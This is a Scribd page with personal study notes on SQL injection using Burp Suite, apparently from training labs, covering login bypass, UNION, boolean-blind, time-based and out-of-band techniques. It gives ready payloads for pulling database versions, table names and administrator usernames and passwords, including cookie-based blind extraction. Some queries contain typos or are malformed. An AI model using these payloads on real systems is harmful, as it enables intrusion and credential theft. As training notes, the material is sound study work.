Scribd
Upload
9 views

Burpsuit SQLinjection

The document discusses different techniques for SQL injection including error based, union based, boolean based blind SQLi, time based blind SQLi, out of band SQLi. It also provides examples of how to find the database version, table names, column values using SQLi in the burpsuite repeater.

Uploaded by

faridayasmindhk1207
Copyright
© © All Rights Reserved
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
9 views

Burpsuit SQLinjection

The document discusses different techniques for SQL injection including error based, union based, boolean based blind SQLi, time based blind SQLi, out of band SQLi. It also provides examples of how to find the database version, table names, column values using SQLi in the burpsuite repeater.

Uploaded by

faridayasmindhk1207
Copyright
© © All Rights Reserved
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 5

burpSuit_SQLinjection:

Types of Pentesting>

Network services : Servers, FW, Switches, routers, printers, workstations


Client side Pentesting : Putty, email, Browsers (Gmail, edge, firefox,opera etc),
PS, Office
Web application
Social engineering
Wireless network : Laptops, IoT devices, smartphones. > device used : WiFi
Piuneapple and NUC

SQLi using to bypass user/pass:

>username: admin'--

>> select * from users where username='admin'--' and password='rony';


>>> select * from users where username='admin' >> -- comment out the rest of the
query part which is password='rony' and return the admin profile to the attacker.
It is called sql injection and haijaking aythentication.

Error Based SQLi:

> use SQL specific characters ' or " and look for errors or other anamolies.
> different characters give you different errors.

Union Based SQLi:

> 2 quries 2 results combine with UNION


> the number and the order of the cols must be same in all quries.
> data types must be compatible.
> to exploit first you need to find out the no of cols. use ORDER BY
>> select title, cost from product where id=1 order by 1-- :: order by 2-- / order
by 3-- / 4... try to find out when it through you error message in which order by
number and from that way you actually find out the no of cols.

> NULL Values use with UNION clause to find out the no of cols.
>> select title, cost from product where id=1 UNION SELECT NULL-- ; Incrementally
inject a series of UNION SELECT payloads specify a different number of NULL valuse
until you no longer get an error.
>> ' UNION SELECT NULL, NULL, NULL--
>> through a error message if that much cols are not present in the prior query or
first query.
> UNION / INTERSECT / EXCEPT operator could be used in the query expression.

> next figure out data types of the cols.


>> when we get the no of cols then we try to change the NULL to 'string' value and
find out the output if it shows no erros then the col is 'string' data type or else
find other type eg: int / double / .... etc.
>> 'UNION SELECT 'a', NULL--
>> 'UNION SELECT NULL, 'a'--

Boolean-Based Blind SQLi:

> submit a boolean condition that evalutes to FALSE and note the responses.
> submit a boolean condition that evalutes to TRUE and note the responses.
> write a program that uses conditional statements to ask the databases a series of
TRUE/FALSE questions and monitor the response.

> www.random.com/app.php?id=1
>> select title from product where id=1 (Backend Query)
> www.random.com/app.php?id=1 and 1=2 (Payload#1:False)
>> select title from product where id=1 and 1=2 (Backend Query)
> www.random.com/app.php?id=1 and 1=1 (Payload#1:True)
>> select title from product where id=1 and 1=1 (Backend Query)

Users table:

Administrator / hash value:


e3c33e889e0e1b62cb7f65b63b60c42bd77275d0e730432fc37b7e624b09ad1f

Payload:

www.random.com/app.php?id=1 and substring((select password Users where


UserName='Administrator'),1,1) = 's'

Backend Query:

select title from product where id=1 and substring((select password from Users
where UserName='Administrator'),1,1) ='s'

>>>> Nothing is returned on the page >>> Returned False >> 's' is NOT the first
character of the hashed password.

Payload:

www.random.com/app.php?id=1 and substring((select password Users where


UserName='Administrator'),1,1) = 'e'

Backend Query:

select title from product where id=1 and substring((select password from Users
where UserName='Administrator'),1,1) ='e'

>>> Title of the product id 1 is returned on the page. >> returned true >> 'e' is
the first character of the hashed password.
Time Based Blinf SQLi::

> submit a payload that apuses the application for a specific period of time.
> write a program that uses conditional statements to ask the database a series of
TRUE/FALSE questions and monitor the response time.

> pausing for a specified amount of time then return the results indicate a
successful SQL query execution.

>> if the first character of the administrator's hashed password is an 'a' wait for
10 secs. if the responds takes 10 secs >>> first letter is 'a' or else not 'a'

OUT OF BAND SQLi:: (OAST)

> submit OAST payloads designed to trigger an out of band network interaction when
executed within an SQL query and monitor for any resulting interactions.
> depending on SQL injection use different methods to exfilterate data.

Automated SQL Injection tools>>> SQL MAP

> https://github.com/sqlmapproject/sqlmap
> open source
> customizable
> good for SQLi
> parameters selection

Other vulnerabilities detection tolls used::

> WAVS :: Web Application Vulnerability Scanners


> BURP SUIT
> ACUNETIX
> W3af
> Wapiti
> arachni

How to find SQLi Vulnerabilities?

>

How we inject sql cmd injection test using burpsuit| repeater?

> after intercepting the current website traffic using intruder | intercept on and
sending the GET selection to REPEATER tab we get the output like below: Select
'Categories'>>

> GET /filter?category='+UNION+SELECT+NULL+FROM+dual-- HTTP/1.1


>> we select or filter by 'catagory' from website page.
>> we use ' to comment out the previous cmd. end of query.
>> 'UNION' cmd use from SQL query language to concatenate another sql
statement with the existing cmd that comment out using " ' " sign, which will
not impacted on the query and next UNION query will get full preferences.
>> use 'NULL' to check the column type: whether it is string type or not. eg:
GET /filter?category='+UNION+SELECT+'abc'+FROM+dual-- HTTP/1.1

>> dual is a by default table for Oracle DB.


>> -- HTTP/1.1 comment out.

How to find the oracle database's version?

> The table contain the header information of ORACLE DB is v$version table in
oracle DB.
> we can find out the detail information with the query "select * from v$version;"
> the column that contain the db version detail is 'BANNER'
> so we can achieve the version detail from v$versiontable from BANNER column.
> GET /filter?category='+UNION+SELECT+BANNER,+NULL+FROM+v$version-- HTTP/1.1
>> output:
:: CORE 11.2.0.2.0 Production
:: NLSRTL Version 11.2.0.2.0 - Production
:: Oracle Database 11g Express Edition Release 11.2.0.2.0 64bit Productio9n.
:: PL/SQL Release 11.2.0.2.0 Production
:: TNS for Linux : Version 11.2.0.2. - Production

How to find the mySQL and Microsoft database's version?

> GET /filter?category='+UNION+SELECT+@@version,+NULL# HTTP/1.1 (we use # as


comment rather than --, window)

Find the table name (table_name) from the database (information_schema.tables)?

(This method we use to find out the username and password of the DB, but before
finding that we need to know the table that contains the user/pass detail.
Currently we know most of the DB has table called table_name in DB called
information_schema.tables that contains all the relevant information of user/pass.)

> GET /filter?category='+UNION+SELECT+table_name,


+NULL+FROM+information_schema.tables-- HTTP/1.1

Find the number of columns from the table called users_abcd from
information_schema?

> GET /filter?


category='+UNION+SELECT+information_schema.columns+WHERE+table_name='users_abcd'--
HTTP/1.1
Find the columns contents or row values of the defined columns?

> GET /filter?category='+UNION+SELECT+username_abcd,password_efgh+FROM+users_abcd--


HTTP/1.1

How to retrive MULTIPLE VALUES (username and password:concatenat ||) in a Single


column?

> GET /filter?category='UNION+SELECT+NULL,+username||'*'||password+FROM+USERS--


HTTP/1.1

BLIND SQL Injection:

Blind SQL injection using manupulating cookies TRACKingID >>>

> Cookie: TrackingId=sumjZvsUDtuMlnKc; session=CBO5Km7917VYwEeZdAx0PGzeEAApldVB

To check the instance of the website whether it is SQL injectable or not? we use '
AND ' 1'='1;

> Cookie: TrackingId=sumjZvsUDtuMlnKc; session=CBO5Km7917VYwEeZdAx0PGzeEAApldVB'


AND '1'='1;

it is always true coz 1 is always equal to 1 and true expression. And full
expression will be true when first part ( TrackingID) is true.

> Cookie: TrackingId=sumjZvsUDtuMlnKc; session=CBO5Km7917VYwEeZdAx0PGzeEAApldVB'


AND '1'='2; >>> False

THIS IS CALLED BLIND as previously if it is FALSE then it give you 500 error
message but in this case it did not give anything. So how we find it is true or
false???? No Visual feedback given.

> the nature of the website's behavior. Like if it say welcome back to the site...
means you succssfully access in the website... or else you didn't.

> Cookie: TrackingId=sumjZvsUDtuMlnKc;' AND (SELECT 'a' FROM users WHERE


username='administrator' AND LENGTH(password)>$1$)='a;
session=CBO5Km7917VYwEeZdAx0PGzeEAApldVB

> Cookie: TrackingId=sumjZvsUDtuMlnKc;' AND (SELECT SUBSTRING(password,$1$,1)FROM


users WHERE username='administrator')='$a$;
session=CBO5Km7917VYwEeZdAx0PGzeEAApldVB

>> $1$ :: index 1-20


>> $a$ :: alpha-numeric number combinations:: a-z / 0-9
>> use cluster bomb with 1st payload $1$ and second payload $a$

You might also like